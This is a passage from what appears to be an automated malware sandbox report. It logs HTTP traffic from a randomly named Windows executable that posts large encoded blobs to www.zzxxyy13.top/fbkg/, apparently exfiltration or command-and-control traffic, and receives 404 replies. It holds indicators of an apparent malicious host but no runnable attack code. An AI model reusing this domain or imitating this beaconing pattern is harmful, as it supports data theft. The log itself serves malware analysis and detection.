                                                                                                                                                                                                Data Ascii: +sDzcJ9oOEciLWnc6020Dh4jmkV7agGB/nhVk9ThLp6WGhekqK9247zoinp6JBXbka2od3mRfUfO97SNRRsMKzjPUEnV2nh62hnGLjXMXpUtGWHX+YjI0VcTZZK200eD2O05VaNfMpNe4RIiTQgtsZ9DfomsyQon6bScfgFa5yxybypXmw5zgyNhZd2aiH/mUdrdSaGIjfqfjvdzKquIosRv9qzwzZiIQqndWRTJAOpspbpfG5O
                                                                                                                                                                                                Nov 17, 2023 19:30:05.446083069 CET877INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:30:09 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                Nov 17, 2023 19:30:05.446450949 CET880OUTData Raw: 59 63 6f 32 72 2f 67 55 6d 47 69 61 38 41 73 30 35 63 54 6e 37 71 76 31 4d 32 2b 71 72 69 47 76 61 7a 2b 51 6b 48 4a 33 6a 72 4b 55 64 31 49 56 37 5a 36 4f 36 41 6e 42 65 55 32 4c 78 4e 64 7a 48 76 59 52 49 39 46 32 52 77 53 51 46 6c 6d 47 33 56
                                                                                                                                                                                                Data Ascii: Yco2r/gUmGia8As05cTn7qv1M2+qriGvaz+QkHJ3jrKUd1IV7Z6O6AnBeU2LxNdzHvYRI9F2RwSQFlmG3VH/umsFETyQvbrJU/iHnPe/6kOouNUjuYCTJC4ua0cvEXYvVkRMc/q8tVpjqlLLHke6Iby2aBE5v5yBJc4pk9f4rQ55tOYnAbluXlF1c5vIkI/BM6EwGroG1te8IqHrULJpi+UOxw0QY7EVCUP+qynjJySCrHVxZGo
                                                                                                                                                                                                Nov 17, 2023 19:30:05.446619987 CET883OUTData Raw: 77 4e 4c 4d 78 57 2b 6d 57 6e 47 6a 4e 66 64 4f 30 54 35 37 4c 74 78 58 6e 42 5a 79 37 64 74 35 4c 63 37 4e 58 48 64 4f 67 58 66 71 4b 7a 43 34 55 58 7a 69 4e 6c 43 57 4f 36 31 56 42 49 73 48 35 5a 61 68 46 71 78 58 49 6c 74 78 5a 70 74 5a 38 2b
                                                                                                                                                                                                Data Ascii: wNLMxW+mWnGjNfdO0T57LtxXnBZy7dt5Lc7NXHdOgXfqKzC4UXziNlCWO61VBIsH5ZahFqxXIltxZptZ8+39upFw8jukZG/hyEwtcd4sBUA+cO8Lvj84xo4UTd+BE1nB3Eanb70FhH7jBUkec8NVo8UMV5K+W0b9ssKVTOOnEl9guVVnrZe0BJSytnoroWVjZ62d25nQGu/q1By0Pfu7SquGpbPZ+0xMHFHyGyzanKH0kpRpQGb
                                                                                                                                                                                                Nov 17, 2023 19:30:05.768614054 CET885OUTData Raw: 70 64 57 75 78 2b 76 33 77 50 4e 4b 31 33 37 79 4b 55 69 31 33 49 66 47 56 79 51 38 65 59 76 78 64 30 5a 66 6d 31 5a 38 64 4f 4e 56 32 35 53 6f 33 45 66 7a 62 70 68 57 69 75 78 4f 66 55 4d 39 62 4b 4a 6b 71 57 43 78 57 63 41 59 61 6a 61 44 54 41
                                                                                                                                                                                                Data Ascii: pdWux+v3wPNK137yKUi13IfGVyQ8eYvxd0Zfm1Z8dONV25So3EfzbphWiuxOfUM9bKJkqWCxWcAYajaDTAYazfR9ukj2b1e7zijcvjsvkphru5f11ihGabuISyyf+Ecd9kB73ImfwjxZHGnfqJaA+3ekCJokpiBzky3sZNPwcmzt9Ui09x0bZxBE1pZGlvMScpupAjBF4A1wdWROmlVAo9J0ps+zxCJk01defZNho34Am22Lr1p
                                                                                                                                                                                                Nov 17, 2023 19:30:05.768784046 CET888OUTData Raw: 47 4c 4c 4d 49 4d 59 67 41 55 4c 43 4e 64 67 77 41 6b 33 4f 71 6c 47 78 4e 50 71 4c 7a 58 49 49 38 55 6b 4b 6f 62 4f 48 57 37 4a 4e 70 4d 77 6e 35 41 64 6f 6d 47 56 79 6b 58 52 75 54 54 4e 6c 78 4e 70 42 36 7a 43 49 2b 63 4c 32 5a 53 51 2b 79 71
                                                                                                                                                                                                Data Ascii: GLLMIMYgAULCNdgwAk3OqlGxNPqLzXII8UkKobOHW7JNpMwn5AdomGVykXRuTTNlxNpB6zCI+cL2ZSQ+yqeQT4Qn+51xGt26Q2IkMa0Mn2XJfHCiKJn6T/BMBAvDzJ22K8HW99+IC94HMIIAGs4ig8JMZ9PJupPyDK4EQ/uuYNWR3/4/mwVFxs3ZlLBa/sq7789j5YAklhoxS4oiPOXg03sZyOtyxmOH2GKndGiLZ9Ut9EC3Ux/
                                                                                                                                                                                                Nov 17, 2023 19:30:05.768867016 CET893OUTData Raw: 46 4b 30 70 4b 41 73 79 58 35 54 51 38 6b 54 4e 4c 2f 2b 42 64 61 49 31 37 74 68 59 73 35 4b 77 5a 50 67 6e 74 4d 52 77 32 4e 41 38 43 30 44 4a 76 6c 63 63 73 65 62 50 6a 47 43 45 32 6e 50 6f 76 74 32 6d 77 5a 67 74 74 54 4e 53 6e 31 45 71 48 30
                                                                                                                                                                                                Data Ascii: FK0pKAsyX5TQ8kTNL/+BdaI17thYs5KwZPgntMRw2NA8C0DJvlccsebPjGCE2nPovt2mwZgttTNSn1EqH05sUAfWhHrjGakksE3LQ1oGlHktsnNoZOPg7DLj0SJiQqig40aOCcV8vx4svEsb8BS46/Qic8myW48LvY+XCYkgNAjB2g1CNQTavo3qSZtUwfaYTfxkUzE+BZNOhzuTGJnvxa/6d/h8iJOZPCkrmZEuT7ngyxp7YtO
                                                                                                                                                                                                Nov 17, 2023 19:30:05.769489050 CET901OUTData Raw: 62 33 39 58 37 43 71 53 42 42 4f 4a 74 39 4a 4e 65 51 49 2f 30 62 6b 34 36 4f 51 6f 79 7a 56 34 48 6e 4f 54 6f 4f 48 62 47 73 6e 38 5a 58 54 66 6a 34 6c 66 63 65 4c 41 37 6e 72 66 31 57 49 64 61 62 6d 56 30 51 42 70 64 50 62 72 34 56 62 76 6d 50
                                                                                                                                                                                                Data Ascii: b39X7CqSBBOJt9JNeQI/0bk46OQoyzV4HnOToOHbGsn8ZXTfj4lfceLA7nrf1WIdabmV0QBpdPbr4VbvmP6WEehq4WT0t4rfdm5Ahu7tfMDy7TdjOL51PveRTnm6KP+TteDuZO6RsWxgJOgDdUBHhf/X3dsyDQv3ug2HmjhwRlxeLkT8M/bHtce6RCLxnhEWJc1yS+NI496EYR0TnwINs5uvMsE/getnd5ZNxjUk0QR59uYB5ny
                                                                                                                                                                                                Nov 17, 2023 19:30:05.769656897 CET908OUTData Raw: 4b 39 65 2f 4b 33 2b 62 67 54 63 6f 58 6d 6d 52 74 32 39 50 64 56 72 56 41 62 4f 33 63 6f 76 7a 45 45 44 39 38 38 31 65 6f 65 79 61 79 72 6c 47 57 64 74 47 76 55 53 48 6b 33 54 58 33 31 59 63 34 4e 35 5a 61 68 64 4c 34 51 58 4a 33 61 69 72 75 46
                                                                                                                                                                                                Data Ascii: K9e/K3+bgTcoXmmRt29PdVrVAbO3covzEED9881eoeyayrlGWdtGvUSHk3TX31Yc4N5ZahdL4QXJ3airuFyk3VER0hbizOCcHiDVlfFzlHvzOWXq06B4yZbAdUwoomxy+w/xqnW5QT8xjKhwHV/Dbag8niB9wjfCMU6y9mmOX+67Cpogf18iDjET8p3qrz1C/TH2PAYexb8e2JbPvVAmRfzXD9XUw5uXYUUIu3xmPZbAPkx5817


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                37160.202.170.2180192.168.11.2050164C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                Nov 17, 2023 19:30:05.124326944 CET859OUTPOST /fbkg/ HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                Accept-Language: en-US,en
                                                                                                                                                                                                Host: www.zzxxyy13.top
                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Length: 52912
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Origin: http://www.zzxxyy13.top
                                                                                                                                                                                                Referer: http://www.zzxxyy13.top/fbkg/
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                                                                                                                Data Raw: 54 36 49 3d 6b 6a 31 6b 4b 48 4a 2f 79 6b 57 62 44 6d 68 66 76 63 66 62 69 58 30 30 70 44 44 71 74 6a 64 7a 59 42 36 30 49 36 62 45 59 54 30 77 54 50 75 2f 52 78 32 36 6c 69 36 32 53 51 77 2f 6f 33 51 72 79 4c 64 4f 42 33 39 2f 78 2b 4d 46 67 76 50 4c 47 4f 65 75 54 5a 57 54 39 4d 2b 6a 7a 79 6c 73 4a 33 58 6b 79 43 49 51 69 65 4d 4e 74 44 39 6b 4f 45 35 74 6d 36 58 75 4d 67 56 70 66 6c 2b 63 43 5a 34 36 47 69 36 34 37 67 63 48 68 77 5a 5a 45 56 34 59 6f 53 41 46 42 70 37 6c 68 31 61 72 37 54 43 6e 2b 75 36 45 6e 58 46 66 63 50 6a 58 53 58 51 32 76 42 70 63 36 78 69 77 37 35 47 54 2f 38 57 43 64 36 79 78 43 48 45 54 57 74 77 64 44 76 78 59 6d 63 5a 34 6b 6f 44 6a 36 79 6e 43 7a 55 48 68 44 56 4f 59 54 4c 45 77 4c 72 57 76 41 62 49 6b 45 67 64 71 5a 65 64 4a 76 67 2b 36 56 38 70 6c 4a 77 52 35 54 48 39 34 77 48 6c 33 69 62 44 38 76 49 4d 7a 44 58 62 4a 34 70 44 77 62 6c 67 47 64 56 70 78 7a 58 6e 5a 4b 64 57 5a 6f 70 61 72 55 32 32 36 73 6f 41 4a 43 55 71 6e 54 77 34 43 38 53 61 33 6c 6a 56 58 35 2b 70 2b 72 4e 6a 34 33 2b 4e 5a 34 70 53 79 52 78 44 35 55 53 7a 6d 32 73 77 58 79 57 46 41 73 43 73 43 45 6c 58 59 6e 37 67 74 42 5a 79 67 74 70 46 64 31 74 50 53 7a 44 50 34 76 51 61 34 67 59 7a 61 30 6d 6c 49 78 6d 74 50 48 52 6f 41 78 59 2f 38 75 47 31 6e 69 62 6c 4e 42 56 54 2b 2f 33 65 36 79 2f 4a 36 54 50 4e 41 77 57 7a 6f 31 42 6e 6c 69 51 57 4a 4c 42 59 53 62 6a 71 52 6c 4f 70 6d 5a 5a 6c 78 34 55 69 38 69 6c 2f 57 46 61 56 6c 6c 54 2f 4a 2f 4e 66 4b 47 74 4f 67 57 49 49 32 65 73 37 38 47 71 4d 71 44 6f 6e 62 56 55 63 35 51 4b 61 30 47 50 68 2f 30 36 48 68 4e 77 37 66 6c 62 71 4b 63 39 6e 56 2b 65 63 70 59 71 32 50 4c 4a 78 75 35 59 67 73 53 57 67 51 6c 57 4e 49 6e 34 39 65 74 54 51 70 32 4b 58 79 68 51 4c 35 33 4d 44 32 5a 79 55 67 30 6b 72 2f 71 6a 38 72 66 55 69 52 53 55 67 48 4c 71 47 62 30 45 51 71 4f 65 57 6f 77 36 51 54 63 69 46 79 72 78 76 63 39 6b 37 63 69 2b 35 62 56 33 6c 69 4f 47 4a 74 46 4c 46 65 6c 58 4c 58 30 41 65 74 65 74 6c 65 48 4a 50 67 76 30 58 78 42 36 66 6e 44 78 61 75 67 6a 72 72 2b 75 6a 4c 4b 47 53 77 6a 77 73 35 4f 44 70 56 4b 32 52 38 70 65 46 45 65 69 4d 37 36 37 45 34 41 6d 4a 59 58 6b 62 79 48 31 55 39 36 58 33 39 59 50 78 65 65 32 41 48 7a 30 7a 34 41 79 6e 41 76 71 70 43 36 4e 30 36 77 33 4f 64 72 50 6c 4c 37 41 32 53 56 64 61 58 42 4b 78 6c 4e 44 4d 74 52 43 48 33 41 71 72 44 63 48 71 5a 70 6a 78 6e 37 53 37 59 58 6e 6f 6a 41 6c 49 38 41 32 32 50 5a 64 5a 6e 6f 54 6d 65 59 6e 50 6f 34 2f 31 4a 75 58 51 67 67 6a 4b 34 64 70 2b 74 46 6b 49 36 50 75 2b 47 4f 61 56 31 63 42 42 49 74 45 34 6b 4a 6f 65 50 4a 30 6e 79 48 7a 75 33 4c 79 68 6f 77 37 7a 71 72 77 53 63 6c 67 38 6f 51 52 70 6b 4e 2f 32 2f 44 4e 73 35 61 62 64 61 4e 6d 59 73 56 34 6e 46 49 65 52 4f 78 75 76 77 55 2b 65 56 43 50 77 75 72 33 55 54 35 69 68 74 53 76 75 65 78 62 73 4b 74 74 74 4c 39 58 45 47 59 39 6b 42 6a 32 42 41 5a 52 31 47 4f 49 64 5a 34 34 30 34 71 4e 6e 65 67 37 2b 6a 63 5a 6d 56 4c 4b 38 64 53 6c 5a 79 44 30 4f 72 42 32 48 78 45 76 66 76 69 47 35 52 6e 4c 55 67 38 79 67 63 79 79 71 75 6d 50 5a 6e 33 30 7a 76 59 48 76 6d 70 7a 4d 46 77 37 66 2f 35 75 36 53 6a 59 54 66 6a 32 77 71 79 32 34 5a 51 4e 49 79 35 55 31 55 69 45 45 48 51 32 56 58 4b 6c 78 34 5a 58 52 64 41 44 51 34 2f 2f 6f 55 49 34 36 79 2b 53 48 31 4d 66 6e 67 44 4c 2f 6b 35 66 72 6d 71 6f 65 34 47 47 58 35 4e 4c 49 48 71 50 6f 54 34 62 62 64 7a 63 2b 61 39 50 72 55 4f 51 55 62 48 45 47 7a 76 78 6c 69 4a 79 4a 4c 6f 34 75 4d 30 2f 6d 54 2f 48 38 45 67 4b 71 79 4b 62 45 6f 54 66 49 43 74 61 43 35 50 72 64 76 48 44 5a 54 61 4e 42 57 72 6d 54 6e 31 4f 52 78 6a 51 62 74 71 6c 73 46 4d 49 4e 67 2f 4a 6d 58 57 2f 47 75 36 65 58 35 35 4e 50 70 39 49 2b 51 6d 68 4a 36 2b 59 61 56 2b 39 31 70 61 59 43 73 74 35 6b 34 38 49 76 51 4b 46 54 5a 58 54 6b 70 65 7a 77 37 77 44 75 70 6f 51 79 7a 62 6e 64 61 57 6b 69 61 42 51 4d 36 4c 66 4b 51 6b 52 43 4e 7a 5a 72 72 50 34 69 4a 4b 57 48 39 41 70 56 52 58 78 6e 67 55 51 6f 55 79 61 30 6b 39 43 51 42 47 35 6e 56 37 46 38 61 64 6f 6d 32 71 46 62 65 49 73 42 6f 48 55 53 6f 63 58 78 73 36 4d 48 7a 59 7a 46 4d 49 57 35
                                                                                                                                                                                                Data Ascii: T6I=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
                                                                                                                                                                                                Nov 17, 2023 19:30:05.124401093 CET861OUTData Raw: 68 74 6c 38 68 71 31 52 36 62 32 68 44 6e 6b 62 72 38 7a 54 50 78 6a 43 6d 38 48 6c 6c 32 52 79 69 49 38 4f 66 39 77 59 79 77 41 74 44 72 42 64 63 38 77 4c 55 6c 66 4b 66 74 44 63 2b 45 6c 79 51 56 4e 79 78 53 47 74 58 48 6e 6b 4d 56 67 64 75 44
                                                                                                                                                                                                Data Ascii: htl8hq1R6b2hDnkbr8zTPxjCm8Hll2RyiI8Of9wYywAtDrBdc8wLUlfKftDc+ElyQVNyxSGtXHnkMVgduDXVOzbYaiNrFl7l4TamPiOHw+EiubTd0WxwSuNSdZ8zxH/R/MsxdMOvCEvBFrYV1Dbbmyw7B7G+J5TuNV23GyuuHQINvNTKvPciMqn8LcPNIBpIdBXggPK8TFCJl87kDMN5hbITa229iuRNJtrsgiJvDjHQ4Qx/vuj
                                                                                                                                                                                                Nov 17, 2023 19:30:05.445769072 CET864OUTData Raw: 46 4d 6b 46 77 4b 7a 57 56 57 30 4e 4a 33 43 37 2b 70 35 66 75 42 62 56 50 75 36 77 52 4a 7a 42 58 6c 4d 6a 4d 65 58 73 36 55 52 6e 52 69 47 54 69 59 66 31 49 4c 41 37 68 51 61 53 34 66 62 4c 33 4f 2b 55 41 68 55 68 72 6d 65 56 73 43 6a 76 31 76
                                                                                                                                                                                                Data Ascii: FMkFwKzWVW0NJ3C7+p5fuBbVPu6wRJzBXlMjMeXs6URnRiGTiYf1ILA7hQaS4fbL3O+UAhUhrmeVsCjv1vE7B7nLK+u3UnEymjflUTbXN68bCjrEZkbXQKYoW0SKYqQPrKg5TwLin6DvCtL8aYnDolL3iSRhtmQzNua6hmnb1yEUv3cnUTa0Co9MrK/rw0b+JLQQn6W2U3q2Q9ENsA3qiYq0S2sWyReOUYMKPhhDUQNRZHafbCT
                                                                                                                                                                                                Nov 17, 2023 19:30:05.445954084 CET877OUTData Raw: 2b 73 44 7a 63 4a 39 6f 4f 45 63 69 4c 57 6e 63 36 30 32 30 44 68 34 6a 6d 6b 56 37 61 67 47 42 2f 6e 68 56 6b 39 54 68 4c 70 36 57 47 68 65 6b 71 4b 39 32 34 37 7a 6f 69 6e 70 36 4a 42 58 62 6b 61 32 6f 64 33 6d 52 66 55 66 4f 39 37 53 4e 52 52
                                                                                                                                                                                                Data Ascii: +sDzcJ9oOEciLWnc6020Dh4jmkV7agGB/nhVk9ThLp6WGhekqK9247zoinp6JBXbka2od3mRfUfO97SNRRsMKzjPUEnV2nh62hnGLjXMXpUtGWHX+YjI0VcTZZK200eD2O05VaNfMpNe4RIiTQgtsZ9DfomsyQon6bScfgFa5yxybypXmw5zgyNhZd2aiH/mUdrdSaGIjfqfjvdzKquIosRv9qzwzZiIQqndWRTJAOpspbpfG5O
                                                                                                                                                                                                Nov 17, 2023 19:30:05.446083069 CET877INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Fri, 17 Nov 2023 18:30:09 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 548
                                                                                                                                                                                                Connection: close
